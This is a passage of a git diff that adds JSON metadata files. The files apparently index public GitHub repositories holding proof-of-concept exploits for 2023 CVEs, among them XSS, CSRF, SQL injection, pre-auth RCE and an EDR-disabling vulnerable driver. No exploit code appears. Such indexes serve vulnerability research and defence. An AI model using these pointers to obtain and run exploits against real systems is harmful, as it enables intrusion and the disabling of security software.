+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44770.json b/2023/CVE-2023-44770.json
new file mode 100644
index 0000000000..7d07b94609
--- /dev/null
+++ b/2023/CVE-2023-44770.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 697998333,
+ "name": "CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias",
+ "full_name": "sromanhu\/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias",
+ "description": "Zenariocms 9.4.59197 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Spare alias from organizer.",
+ "fork": false,
+ "created_at": "2023-09-28T23:18:07Z",
+ "updated_at": "2023-10-06T14:10:32Z",
+ "pushed_at": "2023-09-28T23:21:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44771.json b/2023/CVE-2023-44771.json
new file mode 100644
index 0000000000..7e82518856
--- /dev/null
+++ b/2023/CVE-2023-44771.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 697994632,
+ "name": "CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout",
+ "full_name": "sromanhu\/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout",
+ "description": "Zenariocms 9.4.59197 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Layout",
+ "fork": false,
+ "created_at": "2023-09-28T23:02:00Z",
+ "updated_at": "2023-10-06T14:11:18Z",
+ "pushed_at": "2023-09-28T23:05:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": true,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44811.json b/2023/CVE-2023-44811.json
new file mode 100644
index 0000000000..be296ad3bb
--- /dev/null
+++ b/2023/CVE-2023-44811.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696867620,
+ "name": "CVE-2023-44811",
+ "full_name": "ahrixia\/CVE-2023-44811",
+ "owner": {
+ "login": "ahrixia",
+ "id": 35935843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4",
+ "html_url": "https:\/\/github.com\/ahrixia"
+ },
+ "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-44811",
+ "description": "mooSocial v3.1.8 is vulnerable to Cross Site Request Forgery (CSRF) which allows attacker to change admin password.",
+ "fork": false,
+ "created_at": "2023-09-26T15:25:42Z",
+ "updated_at": "2024-01-06T09:09:36Z",
+ "pushed_at": "2023-10-07T01:31:05Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44812.json b/2023/CVE-2023-44812.json
new file mode 100644
index 0000000000..6e9ad07bbf
--- /dev/null
+++ b/2023/CVE-2023-44812.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696877711,
+ "name": "CVE-2023-44812",
+ "full_name": "ahrixia\/CVE-2023-44812",
+ "owner": {
+ "login": "ahrixia",
+ "id": 35935843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4",
+ "html_url": "https:\/\/github.com\/ahrixia"
+ },
+ "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-44812",
+ "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on Admin redirect function.",
+ "fork": false,
+ "created_at": "2023-09-26T15:47:50Z",
+ "updated_at": "2024-01-06T09:09:47Z",
+ "pushed_at": "2023-10-07T01:32:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44813.json b/2023/CVE-2023-44813.json
new file mode 100644
index 0000000000..ea8afa26ae
--- /dev/null
+++ b/2023/CVE-2023-44813.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696890652,
+ "name": "CVE-2023-44813",
+ "full_name": "ahrixia\/CVE-2023-44813",
+ "owner": {
+ "login": "ahrixia",
+ "id": 35935843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4",
+ "html_url": "https:\/\/github.com\/ahrixia"
+ },
+ "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-44813",
+ "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on Invite Friend function.",
+ "fork": false,
+ "created_at": "2023-09-26T16:16:46Z",
+ "updated_at": "2024-01-06T09:10:03Z",
+ "pushed_at": "2023-10-07T01:35:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44961.json b/2023/CVE-2023-44961.json
new file mode 100644
index 0000000000..580beeb274
--- /dev/null
+++ b/2023/CVE-2023-44961.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 700732996,
+ "name": "CVE-2023-44961",
+ "full_name": "ggb0n\/CVE-2023-44961",
+ "owner": {
+ "login": "ggb0n",
+ "id": 41365666,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41365666?v=4",
+ "html_url": "https:\/\/github.com\/ggb0n"
+ },
+ "html_url": "https:\/\/github.com\/ggb0n\/CVE-2023-44961",
+ "description": "PoC for CVE-2023-44961",
+ "fork": false,
+ "created_at": "2023-10-05T07:27:45Z",
+ "updated_at": "2023-10-12T05:00:13Z",
+ "pushed_at": "2023-10-12T05:00:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": true,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44962.json b/2023/CVE-2023-44962.json
new file mode 100644
index 0000000000..08a60da23b
--- /dev/null
+++ b/2023/CVE-2023-44962.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 700738589,
+ "name": "CVE-2023-44962",
+ "full_name": "ggb0n\/CVE-2023-44962",
+ "owner": {
+ "login": "ggb0n",
+ "id": 41365666,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41365666?v=4",
+ "html_url": "https:\/\/github.com\/ggb0n"
+ },
+ "html_url": "https:\/\/github.com\/ggb0n\/CVE-2023-44962",
+ "description": "PoC for CVE-2023-44962",
+ "fork": false,
+ "created_at": "2023-10-05T07:43:07Z",
+ "updated_at": "2023-12-03T18:02:25Z",
+ "pushed_at": "2023-10-11T04:58:41Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": true,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-44976.json b/2023/CVE-2023-44976.json
new file mode 100644
index 0000000000..21a7a1eb09
--- /dev/null
+++ b/2023/CVE-2023-44976.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 699037101,
+ "name": "BadRentdrv2",
+ "full_name": "keowu\/BadRentdrv2",
+ "owner": {
+ "login": "keowu",
+ "id": 42323126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42323126?v=4",
+ "html_url": "https:\/\/github.com\/keowu"
+ },
+ "html_url": "https:\/\/github.com\/keowu\/BadRentdrv2",
+ "description": "A vulnerable driver exploited by me (BYOVD) that is capable of terminating several EDRs and antivirus software in the market, rendering them ineffective, working for both x32 and x64(CVE-2023-44976).",
+ "fork": false,
+ "created_at": "2023-10-01T18:24:38Z",
+ "updated_at": "2024-06-25T06:34:05Z",
+ "pushed_at": "2024-01-27T01:35:24Z",
+ "stargazers_count": 49,
+ "watchers_count": 49,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 49,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45158.json b/2023/CVE-2023-45158.json
new file mode 100644
index 0000000000..01af32b656
--- /dev/null
+++ b/2023/CVE-2023-45158.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 714422608,
+ "name": "CVE-2023-45158",
+ "full_name": "Evan-Zhangyf\/CVE-2023-45158",
+ "owner": {
+ "login": "Evan-Zhangyf",
+ "id": 53845683,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53845683?v=4",
+ "html_url": "https:\/\/github.com\/Evan-Zhangyf"
+ },
+ "html_url": "https:\/\/github.com\/Evan-Zhangyf\/CVE-2023-45158",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-04T21:14:09Z",
+ "updated_at": "2023-12-02T11:51:12Z",
+ "pushed_at": "2023-11-04T21:22:24Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45182.json b/2023/CVE-2023-45182.json
new file mode 100644
index 0000000000..f281f073e6
--- /dev/null
+++ b/2023/CVE-2023-45182.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 747276396,
+ "name": "CVE-2023-45182",
+ "full_name": "afine-com\/CVE-2023-45182",
+ "owner": {
+ "login": "afine-com",
+ "id": 105647610,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4",
+ "html_url": "https:\/\/github.com\/afine-com"
+ },
+ "html_url": "https:\/\/github.com\/afine-com\/CVE-2023-45182",
+ "description": "IBM i Access Client Solutions < 1.1.9.4 - Weak password encryption",
+ "fork": false,
+ "created_at": "2024-01-23T16:05:55Z",
+ "updated_at": "2024-01-23T16:08:21Z",
+ "pushed_at": "2024-01-26T10:42:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45184.json b/2023/CVE-2023-45184.json
new file mode 100644
index 0000000000..ced087c551
--- /dev/null
+++ b/2023/CVE-2023-45184.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 732046716,
+ "name": "CVE-2023-45184",
+ "full_name": "afine-com\/CVE-2023-45184",
+ "owner": {
+ "login": "afine-com",
+ "id": 105647610,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4",
+ "html_url": "https:\/\/github.com\/afine-com"
+ },
+ "html_url": "https:\/\/github.com\/afine-com\/CVE-2023-45184",
+ "description": "IBM i Access Client Solution < 1.1.9.4 - Local server broken access control.",
+ "fork": false,
+ "created_at": "2023-12-15T14:04:32Z",
+ "updated_at": "2023-12-15T14:06:24Z",
+ "pushed_at": "2024-01-26T10:49:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45185.json b/2023/CVE-2023-45185.json
new file mode 100644
index 0000000000..1ffebd97c7
--- /dev/null
+++ b/2023/CVE-2023-45185.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 747714734,
+ "name": "CVE-2023-45185",
+ "full_name": "afine-com\/CVE-2023-45185",
+ "owner": {
+ "login": "afine-com",
+ "id": 105647610,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4",
+ "html_url": "https:\/\/github.com\/afine-com"
+ },
+ "html_url": "https:\/\/github.com\/afine-com\/CVE-2023-45185",
+ "description": "IBM i Access Client Solutions < 1.1.9.4 - Remote code execution via insecure deserialisation",
+ "fork": false,
+ "created_at": "2024-01-24T13:53:36Z",
+ "updated_at": "2024-01-24T13:53:37Z",
+ "pushed_at": "2024-01-24T13:55:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45239.json b/2023/CVE-2023-45239.json
new file mode 100644
index 0000000000..ae26aefdcd
--- /dev/null
+++ b/2023/CVE-2023-45239.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 793726017,
+ "name": "tac_plus-pre-auth-rce",
+ "full_name": "takeshixx\/tac_plus-pre-auth-rce",
+ "owner": {
+ "login": "takeshixx",
+ "id": 5837896,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837896?v=4",
+ "html_url": "https:\/\/github.com\/takeshixx"
+ },
+ "html_url": "https:\/\/github.com\/takeshixx\/tac_plus-pre-auth-rce",
+ "description": "tac_plus Pre-Auth Remote Command Execution Vulnerability (CVE-2023-45239 & CVE-2023-48643)",
+ "fork": false,
+ "created_at": "2024-04-29T18:48:57Z",
+ "updated_at": "2024-05-17T08:41:48Z",
+ "pushed_at": "2024-05-16T09:08:26Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45280.json b/2023/CVE-2023-45280.json
new file mode 100644
index 0000000000..dcb5f9984d
--- /dev/null
+++ b/2023/CVE-2023-45280.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 786209539,
+ "name": "CVE-2023-45280-1",
+ "full_name": "miguelc49\/CVE-2023-45280-1",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-45280-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:45:21Z",
+ "updated_at": "2024-04-14T17:41:05Z",
+ "pushed_at": "2024-04-15T22:56:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786209568,
+ "name": "CVE-2023-45280-3",
+ "full_name": "miguelc49\/CVE-2023-45280-3",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-45280-3",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-13T18:45:27Z",
+ "updated_at": "2024-04-14T17:41:14Z",
+ "pushed_at": "2024-04-15T22:58:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786350916,
+ "name": "CVE-2023-45280-2",
+ "full_name": "miguelc49\/CVE-2023-45280-2",
+ "owner": {
+ "login": "miguelc49",
+ "id": 158234444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4",
+ "html_url": "https:\/\/github.com\/miguelc49"
+ },
+ "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-45280-2",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-14T07:22:00Z",
+ "updated_at": "2024-04-14T17:41:11Z",
+ "pushed_at": "2024-04-15T22:59:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45288.json b/2023/CVE-2023-45288.json
new file mode 100644
index 0000000000..a2c6b274e9
--- /dev/null
+++ b/2023/CVE-2023-45288.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 785588887,
+ "name": "cont-flood-poc",
+ "full_name": "hex0punk\/cont-flood-poc",
+ "owner": {
+ "login": "hex0punk",
+ "id": 1915998,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1915998?v=4",
+ "html_url": "https:\/\/github.com\/hex0punk"
+ },
+ "html_url": "https:\/\/github.com\/hex0punk\/cont-flood-poc",
+ "description": "PoC for CVE-2023-45288, continuation flood vulnerability",
+ "fork": false,
+ "created_at": "2024-04-12T07:36:39Z",
+ "updated_at": "2024-05-21T23:34:40Z",
+ "pushed_at": "2024-04-16T03:01:52Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45471.json b/2023/CVE-2023-45471.json
new file mode 100644
index 0000000000..25fea7128b
--- /dev/null
+++ b/2023/CVE-2023-45471.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 704942565,
+ "name": "CVE-2023-45471",
+ "full_name": "mehdibelhajamor\/CVE-2023-45471",
+ "owner": {
+ "login": "mehdibelhajamor",
+ "id": 62826765,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62826765?v=4",
+ "html_url": "https:\/\/github.com\/mehdibelhajamor"
+ },
+ "html_url": "https:\/\/github.com\/mehdibelhajamor\/CVE-2023-45471",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-14T15:20:37Z",
+ "updated_at": "2023-10-14T16:46:59Z",
+ "pushed_at": "2023-10-14T16:43:01Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4549.json b/2023/CVE-2023-4549.json
new file mode 100644
index 0000000000..03b9cf42ca
--- /dev/null
+++ b/2023/CVE-2023-4549.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695842595,
+ "name": "CVE-2023-4549",
+ "full_name": "b0marek\/CVE-2023-4549",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4549",
+ "description": "Repository for CVE-2023-4549 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-24T11:57:46Z",
+ "updated_at": "2023-09-24T11:57:47Z",
+ "pushed_at": "2023-09-24T12:09:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45503.json b/2023/CVE-2023-45503.json
new file mode 100644
index 0000000000..d76d94d2cc
--- /dev/null
+++ b/2023/CVE-2023-45503.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 783460926,
+ "name": "CVE-2023-45503",
+ "full_name": "ally-petitt\/CVE-2023-45503",
+ "owner": {
+ "login": "ally-petitt",
+ "id": 76501220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4",
+ "html_url": "https:\/\/github.com\/ally-petitt"
+ },
+ "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2023-45503",
+ "description": "CVE-2023-45503 Reference",
+ "fork": false,
+ "created_at": "2024-04-07T23:43:39Z",
+ "updated_at": "2024-04-11T22:53:45Z",
+ "pushed_at": "2024-04-11T22:53:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45540.json b/2023/CVE-2023-45540.json
new file mode 100644
index 0000000000..3e71a70726
--- /dev/null
+++ b/2023/CVE-2023-45540.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 701340984,
+ "name": "CVE-2023-45540",
+ "full_name": "soundarkutty\/CVE-2023-45540",
+ "owner": {
+ "login": "soundarkutty",
+ "id": 26168410,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26168410?v=4",
+ "html_url": "https:\/\/github.com\/soundarkutty"
+ },
+ "html_url": "https:\/\/github.com\/soundarkutty\/CVE-2023-45540",
+ "description": "CVE-2023-45540 Jorani Leave Management System v1.0.3 – HTML Injection",
+ "fork": false,
+ "created_at": "2023-10-06T12:43:54Z",
+ "updated_at": "2024-05-18T13:29:23Z",
+ "pushed_at": "2024-05-18T13:29:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45542.json b/2023/CVE-2023-45542.json
new file mode 100644
index 0000000000..9446d3d77a
--- /dev/null
+++ b/2023/CVE-2023-45542.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696796100,
+ "name": "CVE-2023-45542",
+ "full_name": "ahrixia\/CVE-2023-45542",
+ "owner": {
+ "login": "ahrixia",
+ "id": 35935843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4",
+ "html_url": "https:\/\/github.com\/ahrixia"
+ },
+ "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-45542",
+ "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on search function.",
+ "fork": false,
+ "created_at": "2023-09-26T12:59:31Z",
+ "updated_at": "2024-01-06T09:10:15Z",
+ "pushed_at": "2023-10-14T04:47:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45657.json b/2023/CVE-2023-45657.json
new file mode 100644
index 0000000000..db9960c350
--- /dev/null
+++ b/2023/CVE-2023-45657.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 707670270,
+ "name": "CVE-2023-45657",
+ "full_name": "RandomRobbieBF\/CVE-2023-45657",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-45657",
+ "description": "Nexter <= 2.0.3 - Authenticated (Subscriber+) SQL Injection via 'to' and 'from'",
+ "fork": false,
+ "created_at": "2023-10-20T12:01:15Z",
+ "updated_at": "2023-11-12T22:42:13Z",
+ "pushed_at": "2023-10-20T12:20:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4568.json b/2023/CVE-2023-4568.json
new file mode 100644
index 0000000000..755531c5c0
--- /dev/null
+++ b/2023/CVE-2023-4568.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 803424741,
+ "name": "CVE-2023-4568",
+ "full_name": "Cappricio-Securities\/CVE-2023-4568",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-4568",
+ "description": "PaperCut NG Unauthenticated XMLRPC Functionality",
+ "fork": false,
+ "created_at": "2024-05-20T17:41:47Z",
+ "updated_at": "2024-06-24T08:27:10Z",
+ "pushed_at": "2024-06-24T08:24:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2023-4568",
+ "papercut",
+ "pentesting",
+ "wapt",
+ "xmlrpc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-45777.json b/2023/CVE-2023-45777.json
new file mode 100644
index 0000000000..befed9d9d8
--- /dev/null
+++ b/2023/CVE-2023-45777.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 745800831,
+ "name": "TheLastBundleMismatch",
+ "full_name": "michalbednarski\/TheLastBundleMismatch",
+ "owner": {
+ "login": "michalbednarski",
+ "id": 1826899,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4",
+ "html_url": "https:\/\/github.com\/michalbednarski"
+ },
+ "html_url": "https:\/\/github.com\/michalbednarski\/TheLastBundleMismatch",
+ "description": "Writeup and exploit for CVE-2023-45777, bypass for Intent validation inside AccountManagerService on Android 13 despite \"Lazy Bundle\" mitigation",
+ "fork": false,
+ "created_at": "2024-01-20T07:14:06Z",
+ "updated_at": "2024-06-22T10:25:39Z",
+ "pushed_at": "2024-01-21T05:04:01Z",
